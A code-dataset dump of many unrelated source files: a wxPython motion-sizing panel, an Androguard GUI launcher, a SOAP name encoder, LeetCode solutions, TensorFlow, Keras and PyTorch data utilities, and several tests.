""" return None def get_conditional_generator(self, resources_path: str) -> Generator: return Generator( resources_path=resources_path, generated_length=self.generated_length, batch_size=self.batch_size, ) def validate_item(self, item: str) -> SmallMolecule: ( molecules, _, ) = validate_molecules([item]) if molecules[0] is None: raise InvalidItem( title="InvalidSMILES", detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"', ) return SmallMolecule(item) @classmethod def get_filepath_mappings_for_training_pipeline_arguments( cls, training_pipeline_arguments: TrainingPipelineArguments ) -> Dict[str, str]: """Ger filepath mappings for the given training pipeline arguments. Args: training_pipeline_arguments: training pipeline arguments. Returns: a mapping between artifacts' files and training pipeline's output files. """ if isinstance(training_pipeline_arguments, PaccMannSavingArguments): return { "smiles_language.pkl": os.path.join( training_pipeline_arguments.model_path, f"{training_pipeline_arguments.training_name}.lang", ), "params.json": os.path.join( training_pipeline_arguments.model_path, training_pipeline_arguments.training_name, "model_params.json", ), "weights.pt": os.path.join( training_pipeline_arguments.model_path, training_pipeline_arguments.training_name, "weights", "best_rec.pt", ), } else: return super().get_filepath_mappings_for_training_pipeline_arguments( training_pipeline_arguments )
2.359375
2
src/form/panel/MultiPanel.py
kaorin/vmd_sizing
32
11810
<gh_stars>10-100 # -*- coding: utf-8 -*- # import wx import wx.lib.newevent from form.panel.BasePanel import BasePanel from form.parts.SizingFileSet import SizingFileSet from module.MMath import MRect, MVector3D, MVector4D, MQuaternion, MMatrix4x4 # noqa from utils import MFileUtils # noqa from utils.MLogger import MLogger # noqa logger = MLogger(__name__) class MultiPanel(BasePanel): def __init__(self, frame: wx.Frame, parent: wx.Notebook, tab_idx: int, file_hitories: dict): super().__init__(frame, parent, tab_idx) self.file_hitories = file_hitories self.header_panel = wx.Panel(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL) self.header_sizer = wx.BoxSizer(wx.VERTICAL) self.description_txt = wx.StaticText(self.header_panel, wx.ID_ANY, "複数人数モーションなどを比率を合わせてサイジングする事ができます。2人目以降を指定して下さい。" \ + "\n縮尺を強制的に変えてますので、足などが元モーションからズレる場合があります。" \ + "\n間違えてファイルセットを追加してしまった場合は、4つのファイル欄をすべて空にしてください。", wx.DefaultPosition, wx.DefaultSize, 0) self.header_sizer.Add(self.description_txt, 0, wx.ALL, 5) self.btn_sizer = wx.BoxSizer(wx.HORIZONTAL) # ファイルセットクリアボタン self.clear_btn_ctrl = wx.Button(self.header_panel, wx.ID_ANY, u"ファイルセットクリア", wx.DefaultPosition, wx.DefaultSize, 0) self.clear_btn_ctrl.SetToolTip(u"既に入力されたデータをすべて空にします。") self.clear_btn_ctrl.Bind(wx.EVT_BUTTON, self.on_clear_set) self.btn_sizer.Add(self.clear_btn_ctrl, 0, wx.ALL, 5) # ファイルセットクリアボタン self.add_btn_ctrl = wx.Button(self.header_panel, wx.ID_ANY, u"ファイルセット追加", wx.DefaultPosition, wx.DefaultSize, 0) self.add_btn_ctrl.SetToolTip(u"サイジングに必要なファイルセットをパネルに追加します。") self.add_btn_ctrl.Bind(wx.EVT_BUTTON, self.on_add_set) self.btn_sizer.Add(self.add_btn_ctrl, 0, wx.ALL, 5) self.header_sizer.Add(self.btn_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5) self.header_panel.SetSizer(self.header_sizer) self.header_panel.Layout() self.sizer.Add(self.header_panel, 0, wx.EXPAND | wx.ALL, 5) # ファイルセット self.file_set_list = [] # ファイルセット用基本Sizer self.set_base_sizer = wx.BoxSizer(wx.VERTICAL) self.scrolled_window = MultiFileSetScrolledWindow(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, \ wx.FULL_REPAINT_ON_RESIZE | wx.VSCROLL | wx.ALWAYS_SHOW_SB) # self.scrolled_window.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DLIGHT)) # self.scrolled_window.SetBackgroundColour("BLUE") self.scrolled_window.SetScrollRate(5, 5) self.scrolled_window.set_file_set_list(self.file_set_list) self.scrolled_window.SetSizer(self.set_base_sizer) self.scrolled_window.Layout() self.sizer.Add(self.scrolled_window, 1, wx.ALL | wx.EXPAND | wx.FIXED_MINSIZE, 5) self.fit() def on_add_set(self, event: wx.Event): self.file_set_list.append(SizingFileSet(self.frame, self.scrolled_window, self.file_hitories, len(self.file_set_list) + 2)) self.set_base_sizer.Add(self.file_set_list[-1].set_sizer, 0, wx.ALL, 5) self.set_base_sizer.Layout() # スクロールバーの表示のためにサイズ調整 self.sizer.Layout() # self.sizer.FitInside(self.scrolled_window) if self.frame.arm_panel_ctrl.arm_alignment_finger_flg_ctrl.GetValue() and len(self.file_set_list) > 0: self.frame.on_popup_finger_warning(event) event.Skip() def on_clear_set(self, event: wx.Event): for file_set in self.file_set_list: file_set.motion_vmd_file_ctrl.file_ctrl.SetPath("") file_set.rep_model_file_ctrl.file_ctrl.SetPath("") file_set.org_model_file_ctrl.file_ctrl.SetPath("") file_set.output_vmd_file_ctrl.file_ctrl.SetPath("") # フォーム無効化 def disable(self): self.file_set.disable() # フォーム無効化 def enable(self): self.file_set.enable() class MultiFileSetScrolledWindow(wx.ScrolledWindow): def __init__(self, *args, **kw): super().__init__(*args, 
**kw) def set_file_set_list(self, file_set_list): self.file_set_list = file_set_list def set_output_vmd_path(self, event, is_force=False): for file_set in self.file_set_list: file_set.set_output_vmd_path(event, is_force)
2.078125
2
androgui.py
nawfling/androguard
1
11811
<gh_stars>1-10
#!/usr/bin/env python
"""Androguard Gui"""

import argparse
import os
import sys

from androguard.core import androconf
from androguard.gui.mainwindow import MainWindow

from PyQt5 import QtWidgets, QtGui

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Androguard GUI")
    parser.add_argument("-d", "--debug", action="store_true", default=False)
    parser.add_argument("-i", "--input_file", default=None)
    parser.add_argument("-p", "--input_plugin", default=None)
    args = parser.parse_args()

    if args.debug:
        androconf.set_debug()

    # We need that to save huge sessions when leaving and avoid
    # RuntimeError: maximum recursion depth exceeded while pickling an object
    # or
    # RuntimeError: maximum recursion depth exceeded in cmp
    # http://stackoverflow.com/questions/2134706/hitting-maximum-recursion-depth-using-pythons-pickle-cpickle
    sys.setrecursionlimit(50000)

    app = QtWidgets.QApplication(sys.argv)
    app.setWindowIcon(QtGui.QIcon(os.path.join(androconf.CONF['data_prefix'], "androguard.ico")))

    window = MainWindow(input_file=args.input_file,
                        input_plugin=args.input_plugin)
    window.resize(1024, 768)
    window.show()

    sys.exit(app.exec_())
2.140625
2
python-trunk/sfapi2/sflib/ZSI/wstools/XMLname.py
raychorn/svn_molten-magma
0
11812
<gh_stars>0 """Translate strings to and from SOAP 1.2 XML name encoding Implements rules for mapping application defined name to XML names specified by the w3 SOAP working group for SOAP version 1.2 in Appendix A of "SOAP Version 1.2 Part 2: Adjuncts", W3C Working Draft 17, December 2001, <http://www.w3.org/TR/soap12-part2/#namemap> Also see <http://www.w3.org/2000/xp/Group/xmlp-issues>. Author: <NAME> <<EMAIL>> Date:: 2002-04-25 Version 0.9.0 """ ident = "$Id: XMLname.py 25 2006-05-24 18:12:14Z misha $" from re import * def _NCNameChar(x): return x.isalpha() or x.isdigit() or x=="." or x=='-' or x=="_" def _NCNameStartChar(x): return x.isalpha() or x=="_" def _toUnicodeHex(x): hexval = hex(ord(x[0]))[2:] hexlen = len(hexval) # Make hexval have either 4 or 8 digits by prepending 0's if (hexlen==1): hexval = "000" + hexval elif (hexlen==2): hexval = "00" + hexval elif (hexlen==3): hexval = "0" + hexval elif (hexlen==4): hexval = "" + hexval elif (hexlen==5): hexval = "000" + hexval elif (hexlen==6): hexval = "00" + hexval elif (hexlen==7): hexval = "0" + hexval elif (hexlen==8): hexval = "" + hexval else: raise Exception, "Illegal Value returned from hex(ord(x))" return "_x"+ hexval + "_" def _fromUnicodeHex(x): return eval( r'u"\u'+x[2:-1]+'"' ) def toXMLname(string): """Convert string to a XML name.""" if string.find(':') != -1 : (prefix, localname) = string.split(':',1) else: prefix = None localname = string T = unicode(localname) N = len(localname) X = []; for i in range(N) : if i< N-1 and T[i]==u'_' and T[i+1]==u'x': X.append(u'_x005F_') elif i==0 and N >= 3 and \ ( T[0]==u'x' or T[0]==u'X' ) and \ ( T[1]==u'm' or T[1]==u'M' ) and \ ( T[2]==u'l' or T[2]==u'L' ): X.append(u'_xFFFF_' + T[0]) elif (not _NCNameChar(T[i])) or (i==0 and not _NCNameStartChar(T[i])): X.append(_toUnicodeHex(T[i])) else: X.append(T[i]) return u''.join(X) def fromXMLname(string): """Convert XML name to unicode string.""" retval = sub(r'_xFFFF_','', string ) def fun( matchobj ): return _fromUnicodeHex( matchobj.group(0) ) retval = sub(r'_x[0-9A-Za-z]+_', fun, retval ) return retval
2.765625
3
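toXMLname/fromXMLname in the record above implement the SOAP 1.2 name-mapping rules: characters that are not legal NCName characters are escaped as _xHHHH_ and a leading 'xml' or '_x' is guarded. The module is Python 2 code (unicode literals, old-style raise); a small round trip, assuming Python 2 and that the module is importable as ZSI.wstools.XMLname:

# -*- coding: utf-8 -*-
# Python 2 example.
from ZSI.wstools.XMLname import toXMLname, fromXMLname

encoded = toXMLname(u"order total")   # space is not an NCName character
print encoded                         # order_x0020_total
print fromXMLname(encoded)            # order total
print toXMLname(u"xmlSchema")         # _xFFFF_xmlSchema  (leading 'xml' gets the guard prefix)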
mmtbx/validation/regression/tst_restraints.py
dperl-sol/cctbx_project
155
11813
<reponame>dperl-sol/cctbx_project<gh_stars>100-1000 from __future__ import absolute_import, division, print_function from libtbx.utils import null_out from libtbx import easy_pickle from six.moves import cStringIO as StringIO def run_validation(pdb_file, ignore_hd=True): from mmtbx.validation import restraints import mmtbx.command_line cmdline = mmtbx.command_line.load_model_and_data( args=[pdb_file], master_phil=mmtbx.command_line.generic_simple_input_phil(), process_pdb_file=True, require_data=False, out=null_out()) validation = restraints.combined( pdb_hierarchy=cmdline.pdb_hierarchy, xray_structure=cmdline.xray_structure, geometry_restraints_manager=cmdline.geometry, ignore_hd=ignore_hd) return validation def exercise_simple(): # extracted from 1lyz, with hydrogens from reduce pdb_in = """ ATOM 1 N LYS A 1 3.296 9.888 10.739 1.00 7.00 N ATOM 2 CA LYS A 1 2.439 10.217 9.791 1.00 6.00 C ATOM 3 C LYS A 1 2.439 11.997 9.160 1.00 6.00 C ATOM 4 O LYS A 1 2.637 12.656 10.107 1.00 8.00 O ATOM 5 CB LYS A 1 0.659 10.086 8.844 1.00 6.00 C ATOM 6 CG LYS A 1 0.198 10.415 8.086 1.00 6.00 C ATOM 7 CD LYS A 1 -1.187 10.086 8.212 1.00 6.00 C ATOM 8 CE LYS A 1 -2.175 10.086 7.264 1.00 6.00 C ATOM 9 NZ LYS A 1 -3.527 9.869 7.288 1.00 7.00 N ATOM 0 H1 LYS A 1 3.156 9.045 10.986 1.00 7.00 H ATOM 0 H2 LYS A 1 4.127 9.972 10.431 1.00 7.00 H ATOM 0 H3 LYS A 1 3.184 10.425 11.440 1.00 7.00 H ATOM 0 HA LYS A 1 2.772 9.314 9.912 1.00 6.00 H ATOM 0 HB2 LYS A 1 0.584 9.128 8.712 1.00 6.00 H ATOM 0 HB3 LYS A 1 0.046 10.323 9.557 1.00 6.00 H ATOM 0 HG2 LYS A 1 0.310 11.376 8.015 1.00 6.00 H ATOM 0 HG3 LYS A 1 0.563 10.027 7.276 1.00 6.00 H ATOM 0 HD2 LYS A 1 -1.193 9.186 8.573 1.00 6.00 H ATOM 0 HD3 LYS A 1 -1.516 10.674 8.910 1.00 6.00 H ATOM 0 HE2 LYS A 1 -2.097 10.964 6.860 1.00 6.00 H ATOM 0 HE3 LYS A 1 -1.857 9.444 6.610 1.00 6.00 H ATOM 0 HZ1 LYS A 1 -3.725 9.170 6.774 1.00 7.00 H ATOM 0 HZ2 LYS A 1 -3.787 9.706 8.123 1.00 7.00 H ATOM 0 HZ3 LYS A 1 -3.949 10.590 6.982 1.00 7.00 H ATOM 10 N VAL A 2 2.637 12.722 7.707 1.00 7.00 N ATOM 11 CA VAL A 2 2.307 14.172 7.580 1.00 6.00 C ATOM 12 C VAL A 2 0.857 14.041 6.949 1.00 6.00 C ATOM 13 O VAL A 2 0.659 13.843 5.875 1.00 8.00 O ATOM 14 CB VAL A 2 3.625 14.172 6.759 1.00 6.00 C ATOM 15 CG1 VAL A 2 3.494 15.491 6.317 1.00 6.00 C ATOM 16 CG2 VAL A 2 4.746 13.843 7.580 1.00 6.00 C ATOM 0 H VAL A 2 2.920 12.338 6.992 1.00 7.00 H ATOM 0 HA VAL A 2 2.195 14.925 8.181 1.00 6.00 H ATOM 0 HB VAL A 2 3.767 13.528 6.048 1.00 6.00 H ATOM 0 HG11 VAL A 2 4.250 15.721 5.755 1.00 6.00 H ATOM 0 HG12 VAL A 2 2.674 15.582 5.808 1.00 6.00 H ATOM 0 HG13 VAL A 2 3.467 16.087 7.081 1.00 6.00 H ATOM 0 HG21 VAL A 2 5.554 13.850 7.043 1.00 6.00 H ATOM 0 HG22 VAL A 2 4.827 14.495 8.294 1.00 6.00 H ATOM 0 HG23 VAL A 2 4.620 12.960 7.962 1.00 6.00 H END """ pdb_file = "tst_validate_restraints_simple.pdb" open(pdb_file, "w").write(pdb_in) v1 = run_validation(pdb_file, ignore_hd=True) out1 = StringIO() v1.show(out=out1) assert (""" ----------Chiral volumes---------- atoms ideal model delta sigma residual deviation A 1 LYS CA A 1 LYS N A 1 LYS C A 1 LYS CB 2.57 1.12 1.45 2.00e-01 5.25e+01 7.2*sigma """ in "\n".join([ l.rstrip() for l in out1.getvalue().splitlines() ])) s = easy_pickle.dumps(v1) v1p = easy_pickle.loads(s) out1p = StringIO() v1p.show(out=out1p) assert (out1.getvalue() == out1p.getvalue()) v2 = run_validation(pdb_file, ignore_hd=False) out2 = StringIO() v2.show(out=out2) assert (out2.getvalue() != out1.getvalue()) assert ("""\ A 1 LYS HA 110.00 57.00 53.00 3.00e+00 3.12e+02 
17.7*sigma A 1 LYS N A 1 LYS CA """ in "\n".join([ l.rstrip() for l in out2.getvalue().splitlines() ])) # # C-alpha-only model (from 3b5d) pdb_raw = """\ CRYST1 115.100 43.700 76.400 90.00 108.10 90.00 C 1 2 1 8 ATOM 1 CA TYR A 6 -7.551 -11.355 -17.946 1.00148.04 C ATOM 2 CA LEU A 7 -8.052 -8.804 -20.730 1.00310.75 C ATOM 3 CA GLY A 8 -10.874 -6.691 -19.353 1.00158.95 C ATOM 4 CA GLY A 9 -9.359 -7.332 -15.966 1.00217.68 C ATOM 5 CA ALA A 10 -5.806 -6.508 -16.946 1.00239.12 C ATOM 6 CA ILE A 11 -7.024 -3.514 -18.905 1.00103.16 C ATOM 7 CA LEU A 12 -10.023 -2.071 -17.056 1.00230.80 C ATOM 8 CA ALA A 13 -7.313 -1.820 -14.420 1.00141.04 C """ pdb_file = "tst_validate_restraints_calpha.pdb" open(pdb_file, "w").write(pdb_raw) v1 = run_validation(pdb_file, ignore_hd=True) if (__name__ == "__main__"): exercise_simple() print("OK")
1.773438
2
Python/repeated-dna-sequences.py
sm2774us/leetcode_interview_prep_2021
0
11814
<reponame>sm2774us/leetcode_interview_prep_2021
# Time:  O(n)
# Space: O(n)

import collections


class Solution(object):
    def findRepeatedDnaSequences(self, s):
        """
        :type s: str
        :rtype: List[str]
        """
        dict, rolling_hash, res = {}, 0, []
        for i in range(len(s)):
            rolling_hash = ((rolling_hash << 3) & 0x3fffffff) | (ord(s[i]) & 7)
            if rolling_hash not in dict:
                dict[rolling_hash] = True
            elif dict[rolling_hash]:
                res.append(s[i - 9: i + 1])
                dict[rolling_hash] = False
        return res

    def findRepeatedDnaSequences2(self, s):
        """
        :type s: str
        :rtype: List[str]
        """
        l, r = [], []
        if len(s) < 10:
            return []
        for i in range(len(s) - 9):
            l.extend([s[i:i + 10]])
        return [k for k, v in collections.Counter(l).items() if v > 1]
3.296875
3
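The first solution above packs each base into 3 bits (ord(c) & 7 is distinct for A, C, G, T) and keeps a 30-bit rolling hash of the current 10-character window, so repeats are found in a single pass. A quick check, run in the same module as the class above:

# Classic LeetCode 187 example: two 10-letter sequences occur more than once.
s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
print(Solution().findRepeatedDnaSequences(s))    # ['AAAAACCCCC', 'CCCCCAAAAA']
print(Solution().findRepeatedDnaSequences2(s))   # same two sequences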
recipe/app.py
Udayan-Coding/examples
1
11815
from flask import Flask, render_template, request

app = Flask(__name__)


@app.route("/")
def hello():
    return render_template("index.html", name="WORLD!")


@app.route("/about")
def about():
    return render_template("about.html")
2.859375
3
step2.py
mosheliv/tfcollab1
0
11816
<reponame>mosheliv/tfcollab1<gh_stars>0 """ Usage: # From tensorflow/models/ # Create train data: python generate_tfrecord.py --csv_input=data/train_labels.csv --output_path=train.record # Create test data: python generate_tfrecord.py --csv_input=data/test_labels.csv --output_path=test.record """ from __future__ import division from __future__ import print_function from __future__ import absolute_import import os import io import pandas as pd import tensorflow as tf from PIL import Image from collections import namedtuple, OrderedDict def _int64_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def _bytes_feature(value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _bytes_list_feature(value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=value)) def _float_list_feature(value): return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def _int64_list_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) flags = tf.app.flags flags.DEFINE_string('image_dir', '', 'Path to the image directory') flags.DEFINE_string('csv_input', '', 'Path to the CSV input') flags.DEFINE_string('output_path', '', 'Path to output TFRecord') FLAGS = flags.FLAGS # TO-DO replace this with label map def class_text_to_int(row_label): if row_label == 'Blackbird': return 1 else: None def split(df, group): data = namedtuple('data', ['filename', 'object']) gb = df.groupby(group) return [data(filename, gb.get_group(x)) for filename, x in zip(gb.groups.keys(), gb.groups)] def create_tf_example(group, path): with tf.gfile.GFile(os.path.join(path, '{}'.format(group.filename)), 'rb') as fid: encoded_jpg = fid.read() encoded_jpg_io = io.BytesIO(encoded_jpg) image = Image.open(encoded_jpg_io) width, height = image.size filename = group.filename.encode('utf8') image_format = b'jpg' xmins = [] xmaxs = [] ymins = [] ymaxs = [] classes_text = [] classes = [] for index, row in group.object.iterrows(): xmins.append(row['xmin']) xmaxs.append(row['xmax']) ymins.append(row['ymin']) ymaxs.append(row['ymax']) classes_text.append(row['class'].encode('utf8')) classes.append(class_text_to_int(row['class'])) tf_example = tf.train.Example(features=tf.train.Features(feature={ 'image/height': _int64_feature(height), 'image/width': _int64_feature(width), 'image/filename': _bytes_feature(filename), 'image/source_id': _bytes_feature(filename), 'image/encoded': _bytes_feature(encoded_jpg), 'image/format': _bytes_feature(image_format), 'image/object/bbox/xmin': _float_list_feature(xmins), 'image/object/bbox/xmax': _float_list_feature(xmaxs), 'image/object/bbox/ymin': _float_list_feature(ymins), 'image/object/bbox/ymax': _float_list_feature(ymaxs), 'image/object/class/text': _bytes_list_feature(classes_text), 'image/object/class/label': _int64_list_feature(classes), })) return tf_example def main(_): writer = tf.python_io.TFRecordWriter(FLAGS.output_path) path = FLAGS.image_dir examples = pd.read_csv(FLAGS.csv_input) print(examples.columns.values) grouped = split(examples, 'filename') for group in grouped: tf_example = create_tf_example(group, path) writer.write(tf_example.SerializeToString()) writer.close() output_path = os.path.join(os.getcwd(), FLAGS.output_path) print('Successfully created the TFRecords: {}'.format(output_path)) if __name__ == '__main__': tf.app.run()
2.4375
2
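The converter above expects the csv_input produced by the usual TensorFlow object-detection labelling step: one row per bounding box, grouped by filename, with the class/xmin/ymin/xmax/ymax columns it reads. An illustrative way to produce such a file (file names and box values are made up):

import pandas as pd

# One row per bounding box; the script groups rows by 'filename' and reads
# 'class', 'xmin', 'ymin', 'xmax', 'ymax' (image width/height are re-read from the JPEG itself).
labels = pd.DataFrame([
    {"filename": "bird_001.jpg", "class": "Blackbird", "xmin": 12, "ymin": 30, "xmax": 220, "ymax": 310},
    {"filename": "bird_001.jpg", "class": "Blackbird", "xmin": 300, "ymin": 50, "xmax": 500, "ymax": 400},
])
labels.to_csv("data/train_labels.csv", index=False)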
lh_lib/sensors/esp32/touch.py
lh70/s-connect-python
0
11817
<gh_stars>0
from machine import Pin

from lh_lib.sensors.sensor import AbstractSensor


class Touch(AbstractSensor):
    """
    This represents a touch sensor with integrated Logic,
    where there is only one output pin, which digitally represents the touched state.

    pin:integer can be one of all available GPIO pins: 0-19, 21-23, 25-27, 32-39
                it is NOT recommended to pick one of the following pins:
                (1, 3) -> serial, (6, 7, 8, 11, 16, 17) -> embedded flash
    """

    def __init__(self, pin=35):
        super().__init__()
        self.pin = Pin(pin, Pin.IN)

    """
    sets 0 for LOW and 1 for HIGH
    """
    def update(self):
        self.value = self.pin.value()
3.4375
3
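A minimal polling loop for the Touch sensor above (MicroPython sketch; assumes it runs on the ESP32 with the lh_lib package from this repo installed):

import time

from lh_lib.sensors.esp32.touch import Touch   # module path taken from the record's file path

sensor = Touch(pin=35)
while True:
    sensor.update()          # reads the digital pin into sensor.value
    print(sensor.value)      # 0 = not touched (LOW), 1 = touched (HIGH)
    time.sleep_ms(100)       # MicroPython-specific sleep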
algorithms/python/118.py
viing937/leetcode
3
11818
<filename>algorithms/python/118.py
class Solution:
    def generate(self, numRows):
        """
        :type numRows: int
        :rtype: List[List[int]]
        """
        if numRows == 0:
            return []
        rls = [[1]]
        for i in range(2, numRows+1):
            row = [1] * i
            for j in range(1, i-1):
                row[j] = rls[-1][j-1] + rls[-1][j]
            rls.append(row)
        return rls
3.609375
4
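A quick check of generate, run in the same module as the class above:

triangle = Solution().generate(5)
for row in triangle:
    print(row)
# [1]
# [1, 1]
# [1, 2, 1]
# [1, 3, 3, 1]
# [1, 4, 6, 4, 1]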
squeeze_and_excitation_networks/datasets/data_loader.py
younnggsuk/CV-Paper-Implementation
4
11819
import os import cv2 import albumentations as A from albumentations.pytorch import ToTensorV2 from torch.utils.data import Dataset, DataLoader from sklearn.model_selection import train_test_split __all__ = ['CatDogDataset', 'fetch_dataloader'] class CatDogDataset(Dataset): def __init__(self, file_paths, labels, transform=None): self.file_paths = file_paths self.labels = labels self.transform = transform def __len__(self): return len(self.file_paths) def __getitem__(self, idx): label = self.labels[idx] file_path = self.file_paths[idx] image = cv2.imread(file_path) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if self.transform: transformed = self.transform(image=image) image = transformed["image"] return image, label def fetch_dataloader(types, data_dir, batch_size, num_workers): dataloaders = {} train_dir = os.path.join(data_dir, "train") train_files = sorted(os.listdir(train_dir)) train_labels = [] for file in train_files: if "cat" in file: train_labels.append(0) else: train_labels.append(1) train_file_paths = [os.path.join(train_dir, path) for path in train_files] train_file_paths, val_file_paths, train_labels, val_labels = train_test_split( train_file_paths, train_labels, stratify=train_labels, random_state=42 ) train_transform = A.Compose([ A.SmallestMaxSize(max_size=256), A.HorizontalFlip(p=0.5), A.RandomCrop(224, 224), A.Normalize(), ToTensorV2() ]) eval_transform = A.Compose([ A.SmallestMaxSize(max_size=256), A.CenterCrop(224, 224), A.Normalize(), ToTensorV2() ]) for split in ['train', 'val', 'test']: if split in types: if split == 'train': dl = DataLoader(CatDogDataset(train_file_paths, train_labels, train_transform), batch_size, shuffle=True, num_workers=num_workers) elif split == "val": dl = DataLoader(CatDogDataset(val_file_paths, val_labels, eval_transform), batch_size, shuffle=False, num_workers=num_workers) dataloaders[split] = dl return dataloaders
2.546875
3
seq2seq_utils.py
mumbihere/summarizer
0
11820
<reponame>mumbihere/summarizer from keras.preprocessing.text import text_to_word_sequence from keras.models import Sequential from keras.layers import Activation, TimeDistributed, Dense, RepeatVector, recurrent, Embedding from keras.layers.recurrent import LSTM from keras.optimizers import Adam, RMSprop from nltk import FreqDist import numpy as np import os import datetime def load_data(source, dist, max_len, vocab_size): # Reading raw text from source and destination files f = open(source, 'r') X_data = f.read() f.close() f = open(dist, 'r') y_data = f.read() f.close() # Splitting raw text into array of sequences X = [text_to_word_sequence(x)[::-1] for x, y in zip(X_data.split('\n'), y_data.split('\n')) if len(x) > 0 and len(y) > 0 and len(x) <= max_len and len(y) <= max_len] y = [text_to_word_sequence(y) for x, y in zip(X_data.split('\n'), y_data.split('\n')) if len(x) > 0 and len(y) > 0 and len(x) <= max_len and len(y) <= max_len] # Creating the vocabulary set with the most common words dist = FreqDist(np.hstack(X)) X_vocab = dist.most_common(vocab_size-1) dist = FreqDist(np.hstack(y)) y_vocab = dist.most_common(vocab_size-1) # Creating an array of words from the vocabulary set, we will use this array as index-to-word dictionary X_ix_to_word = [word[0] for word in X_vocab] # Adding the word "ZERO" to the beginning of the array X_ix_to_word.insert(0, 'ZERO') # Adding the word 'UNK' to the end of the array (stands for UNKNOWN words) X_ix_to_word.append('UNK') # Creating the word-to-index dictionary from the array created above X_word_to_ix = {word:ix for ix, word in enumerate(X_ix_to_word)} # Converting each word to its index value for i, sentence in enumerate(X): for j, word in enumerate(sentence): if word in X_word_to_ix: X[i][j] = X_word_to_ix[word] else: X[i][j] = X_word_to_ix['UNK'] y_ix_to_word = [word[0] for word in y_vocab] y_ix_to_word.insert(0, 'ZERO') y_ix_to_word.append('UNK') y_word_to_ix = {word:ix for ix, word in enumerate(y_ix_to_word)} for i, sentence in enumerate(y): for j, word in enumerate(sentence): if word in y_word_to_ix: y[i][j] = y_word_to_ix[word] else: y[i][j] = y_word_to_ix['UNK'] return (X, len(X_vocab)+2, X_word_to_ix, X_ix_to_word, y, len(y_vocab)+2, y_word_to_ix, y_ix_to_word) def load_test_data(source, X_word_to_ix, max_len): f = open(source, 'r') X_data = f.read() f.close() X = [text_to_word_sequence(x)[::-1] for x in X_data.split('\n') if len(x) > 0 and len(x) <= max_len] for i, sentence in enumerate(X): for j, word in enumerate(sentence): if word in X_word_to_ix: X[i][j] = X_word_to_ix[word] else: X[i][j] = X_word_to_ix['UNK'] return X def create_model(X_vocab_len, X_max_len, y_vocab_len, y_max_len, hidden_size, num_layers): model = Sequential() # Creating encoder network model.add(Embedding(X_vocab_len, 1000, input_length=X_max_len, mask_zero=True)) model.add(LSTM(hidden_size)) model.add(RepeatVector(y_max_len)) # Creating decoder network for _ in range(num_layers): model.add(LSTM(hidden_size, return_sequences=True)) model.add(TimeDistributed(Dense(y_vocab_len))) model.add(Activation('softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) return model def process_data(word_sentences, max_len, word_to_ix): # Vectorizing each element in each sequence sequences = np.zeros((len(word_sentences), max_len, len(word_to_ix))) for i, sentence in enumerate(word_sentences): for j, word in enumerate(sentence): sequences[i, j, word] = 1. 
return sequences def find_checkpoint_file(folder): checkpoint_file = [f for f in os.listdir(folder) if 'checkpoint' in f] if len(checkpoint_file) == 0: return [] modified_time = [os.path.getmtime(f) for f in checkpoint_file] return checkpoint_file[np.argmax(modified_time)]
2.765625
3
SAMAE/data/__init__.py
Lisa-pa/SAMAE
0
11821
<reponame>Lisa-pa/SAMAE """Standard test images. """ import os from skimage.io import imread data_dir = os.path.abspath(os.path.dirname(__file__)) __all__ = ['data_dir', 'circle', 'skmuscimg'] def _load(f, as_gray=False): """Load an image file located in the data directory. Parameters ---------- f : string File name. as_gray : bool, optional Whether to convert the image to grayscale. Returns ------- img : ndarray Image loaded from ``data_dir``. """ # importing io is quite slow since it scans all the backends # we lazy import it here return imread(f, as_gray=as_gray) def circle(): """Synthetic image of a circle Returns ------- circle : (xdim, ydim) bool ndarray Circle image. """ return _load(os.path.join(data_dir, "circle.bmp")) def skmuscimg(): """Cropped US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "skmuscle.jpg")) def panoimg(): """Panoramic US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "panoramic_echo.jpg")) def simpleimg(): """Simple US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "simple_echo.jpg")) def downloadFromDropbox(tok, path2file): """Download an image from a Dropbox account. Args: tok (string): access token that connects to the wanted app in Dropbox account path2file (string): Path of the file to download, in the app corresponding to the above token. Output: image (numpy.ndarray): 3-channel color image, with coefficients' type == uint8 Example: 1) Register a new app in the App Console of your Dropbox account. Set up parameters as you want. 2) In Dropbox>Applications>MyApp, import your data. 3) In the settings page of MyApp, generate a token and copy it. It should look like a random string of letters and figures, as below. (!!!This access token can be used to access your account via the API. Don’t share your access token with anyone!!!) > token = '<KEY>' //token not available anymore > path = '/cropped_20181002_153426_image.jpg' > dt = downloadFromDropbox(token, path); """ import dropbox import numpy as np import cv2 dbx = dropbox.Dropbox(tok) try: metadata, file = dbx.files_download(path2file) except dropbox.exceptions.HttpError as err: print('*** HTTP error', err) return None data = np.frombuffer(file.content, np.uint8) image = cv2.imdecode(data, 1) return image
2.8125
3
pandas_support/test_pandas_support.py
quanbingDG/sharper
0
11822
<filename>pandas_support/test_pandas_support.py<gh_stars>0
# -*- coding: utf-8 -*-
# @Time : 2020/11/9 9:13 PM
# @Author : quanbing
# @Email : <EMAIL>
# @File : test_pandas_support.py
import pandas as pd
import numpy as np
from unittest import TestCase
from pandas_support import PandasSupport as PS


class TestPandasSupport(TestCase):
    def setUp(self) -> None:
        self._test_frame = pd.DataFrame(np.array([1, 2, 3, 4]).reshape(2, 2), columns=['i1', 'i2'])

    def test_check_cols(self):
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1']), True)
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col']), False)
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1', 'col3']), False)
        self.assertEqual(PS.check_cols(['col1', 'col2'], 'col1'), True)

    def test_add_ratio(self):
        self.assertEqual(PS.add_ratio(self._test_frame, ['i1']).columns.__len__(), 3)
